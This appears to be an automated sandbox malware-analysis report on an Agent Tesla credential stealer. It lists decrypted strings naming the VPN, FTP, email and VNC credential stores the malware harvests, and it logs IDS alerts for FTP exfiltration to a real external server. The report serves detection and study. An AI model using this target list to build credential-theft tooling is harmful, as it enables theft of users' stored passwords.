Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Private Internet Access\data
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \account.json
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: .*"username":"(.*?)"
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: .*"password":"(.*?)"
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Private Internet Access
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: privateinternetaccess.com
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FileZilla
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: APPDATA
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \FileZilla\recentservers.xml
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: APPDATA
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \FileZilla\recentservers.xml
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Server>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Host>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Host>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </Host>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Port>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </Port>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <User>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <User>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </User>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Pass encoding="base64">
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Pass encoding="base64">
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </Pass>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Pass>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <Pass encoding="base64">
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </Pass>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: CoreFTP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: User
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Host
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Port
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: hdfzpysvpzimorhk
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: WinSCP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HostName
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UserName
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PublicKeyFile
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PortNumber
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: WinSCP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ABCDEF
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Flash FXP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: port
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: user
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: pass
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: quick.dat
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Sites.dat
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \FlashFXP\
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \FlashFXP\
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FTP Navigator
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SystemDrive
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: No Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: User
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SmartFTP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: APPDATA
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: WS_FTP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: appdata
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HOST
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PWD=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PWD=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FtpCommander
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SystemDrive
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SystemDrive
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SystemDrive
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \cftp\Ftplist.txt
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;Password=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;User=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;Server=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;Port=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;Port=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;Password=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;User=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ;Anonymous=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FTPGetter
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \FTPGetter\servers.xml
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_ip>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_ip>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </server_ip>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_port>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </server_port>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_user_name>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_user_name>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </server_user_name>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_user_password>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: <server_user_password>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: </server_user_password>
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FTPGetter
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: The Bat!
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: appdata
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \The Bat!
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Account.CFN
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Account.CFN
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Becky!
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: DataDir
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Folder.lst
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Mailbox.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Account
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PassWd
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Account
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SMTPServer
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Account
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: MailAddress
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Becky!
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Outlook
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: IMAP Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: POP3 Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HTTP Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SMTP Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: IMAP Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: POP3 Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HTTP Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SMTP Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Windows Mail App
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SchemaId
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: pResourceElement
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: pIdentityElement
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: pPackageSid
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: pAuthenticatorElement
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: syncpassword
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: mailoutgoing
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FoxMail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Executable
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: FoxmailPath
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Storage\
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Storage\
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Accounts\Account.rec0
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Accounts\Account.rec0
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Account.stg
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Account.stg
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: POP3Host
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SMTPHost
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: IncomingServer
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Account
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: MailAddress
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: POP3Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Opera Mail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: opera:
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PocoMail
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: appdata
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Pocomail\accounts.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: POPPass
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SMTPPass
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SMTP
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: eM Client
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: eM Client\accounts.dat
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: eM Client
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Accounts
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: "Username":"
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: "Secret":"
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: "ProviderName":"
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: o6806642kbM7c5
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Mailbird
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SenderIdentities
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Accounts
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \Mailbird\Store\Store.db
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Server_Host
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Accounts
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Email
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Username
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: EncryptedPassword
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Mailbird
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: RealVNC 4.x
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: RealVNC 3.x
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: RealVNC 4.x
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: RealVNC 3.x
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\ORL\WinVNC3
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: TightVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\TightVNC\Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: TightVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\TightVNC\Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: PasswordViewOnly
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: TightVNC ControlPassword
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\TightVNC\Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ControlPassword
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: TigerVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\TigerVNC\Server
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Password
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd2
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd2
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd2
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: passwd
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: UltraVNC
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles(x86)
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \UltraVNC\ultravnc.ini
Source: Xc501VOacR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Xc501VOacR.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49839 -> 162.241.203.30:31261
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49830 -> 162.241.203.30:21
Source: global traffic | TCP traffic: 192.168.2.5:49839 -> 162.241.203.30:31261
Source: Joe Sandbox View | IP Address: 162.241.203.30 162.241.203.30
Source: Joe Sandbox View | IP Address: 162.241.203.30 162.241.203.30
Source: Joe Sandbox View | ASN Name: OIS1US OIS1US
Source: unknown | FTP traffic detected: 162.241.203.30:21 -> 192.168.2.5:49830 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 10 of 150 allowed. 220-Local time is now 13:23. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ftp.aminhacorretora.com.br
Source: InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aminhacorretora.com.br
Source: InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.aminhacorretora.com.br
Source: Xc501VOacR.exe, 00000000.00000002.2704584943.00000000061D1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c0/
Source: InstallUtil.exe, 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078CBC58 CreateProcessAsUserW, | 0_2_078CBC58
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_01250A78 | 0_2_01250A78
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_012513D8 | 0_2_012513D8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CD84D8 | 0_2_02CD84D8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CD147E | 0_2_02CD147E
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CD1B08 | 0_2_02CD1B08
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CD7D70 | 0_2_02CD7D70
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_02CDCE00 | 0_2_02CDCE00
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0535D5EC | 0_2_0535D5EC
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0535F3E0 | 0_2_0535F3E0
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0535F3D1 | 0_2_0535F3D1
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_060116A7 | 0_2_060116A7
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_06013857 | 0_2_06013857
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747CF08 | 0_2_0747CF08
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747EFF8 | 0_2_0747EFF8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747D780 | 0_2_0747D780
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747AE52 | 0_2_0747AE52
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747BEEA | 0_2_0747BEEA
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747E148 | 0_2_0747E148
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_07478DB8 | 0_2_07478DB8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747401E | 0_2_0747401E
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_07472F80 | 0_2_07472F80
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_0747CEF8 | 0_2_0747CEF8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C4B50 | 0_2_078C4B50
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C6EB8 | 0_2_078C6EB8
Source: C:\Users\user\Desktop\Xc501VOacR.exe | Code function: 0_2_078C6620 | 0_2_078C6620
